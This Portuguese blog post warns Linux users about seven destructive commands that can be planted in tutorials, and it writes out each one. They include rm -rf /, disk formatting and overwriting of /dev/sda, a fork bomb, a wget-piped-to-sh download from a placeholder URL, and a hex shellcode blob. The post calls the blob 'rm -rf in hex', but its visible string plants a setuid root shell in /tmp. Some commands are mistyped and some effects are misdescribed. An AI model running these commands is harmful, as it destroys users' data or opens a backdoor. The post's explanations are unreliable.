Os 7 comandos mais perigosos do mundo Linux [CUIDADO]

Share

É muito normal lermos diversos tutoriais em busca de uma informação e sair digitando todos os comandos que quem o escreveu mandou. É camarada, muita calma nessa hora.

Infelizmente, existem muitos malintencionados por aí que, dentro de um tutorial sério ou no comentário do mesmo, postam certos comandos para que usuários inexperientes se deem mal. Tome muito cuidado com os sites que você visita em busca de informação.

Esta lista abaixo representa os 7 comandos mais perigosos do mundo Linux. São comandos que você NUNCA DEVE EXECUTAR!

Lembre-se: o terminal é uma ferramenta poderosíssima, porém é preciso muito conhecimento para saber usá-lo.

Primeiro comando:

rm-rf /    (com privilégios de root usando o “sudo” ou logado como root)

Este comando irá apagar todo o seu sistema! Aqui está um vídeo de demonstração da execução deste comando:

Segundo comando:

É o mesmo do comando acima, porém escrito em código hexadecimal.

  • char esp[] __attribute__ ((section(“.text”))) /* e.s.p
  • release */
  • = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
  • “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
  • “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
  • “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
  • “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
  • “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
  • “\x6e\x2f\x73\x68\x00\x2d\x63\x00”
  • “cp -p /bin/sh /tmp/.beyond; chmod 4755
  • /tmp/.beyond;”;

 

Terceiro comando:

mkfs.ext3 /dev/sda

Este comando irá formatar o seu dispositivo /dev/sda e, claro, irá apagar todos os arquivos contidos nele.

 

Quarto comando:

|:(){:|:&};:

Conhecido como “Fork Bomb”, ele irá executar inúmeros processos em seu sistema, fazendo com que o seu computador trave na hora!

 

Quinto comando:

qualquer_comando > /dev/sda

Ele irá escrever a saída do comando executado (qualquer) em /dev/sda, apagando todo o conteúdo preexistente .

 

Sexto comando:

wget http://uma_url_qualquer -O- | sh

O comando wget realiza downloads. Porém, existe no fim da linha um “|”, que funciona como redirecionador. Ou seja, ao término do download, ele executará o arquivo baixado. Se o arquivo não for um shell script, ok. Porém se for, ele executará automaticamente na sua máquina, o que é um prato cheio pra fazer um usuário desavisado se dar mal.

 

Sétimo comando:

mv /home/username/* /dev/null

Irá mover diretório home para um lugar que realmente não existe. Em outras palavras, ele irá apagar seu diretório home.

 

Os comandos listados acima são prejudiciais se executados da forma que exemplificamos. Um exemplo: o sétimo comando prejudicial começa com o comando “mv”, que é responsável por mover arquivos entre diretórios. Ele sozinho não é prejudicial, pelo contrário, é essencial. O problema é usá-lo para “mover a sua home para /dev/null”, que é conhecido como o “buraco negro do Linux”.

Com informações de ubuntubuzz

Quer continuar informado sobre as novidades do Blog Seja Livre? Siga-nos no twitter

Quer continuar por dentro das novidades do Blog Seja Livre? Siga o nosso perfil no TWITTER, curta a nossa página no FACEBOOK ou adicione o Blog Seja Livre nos seus círculos do GOOGLE+.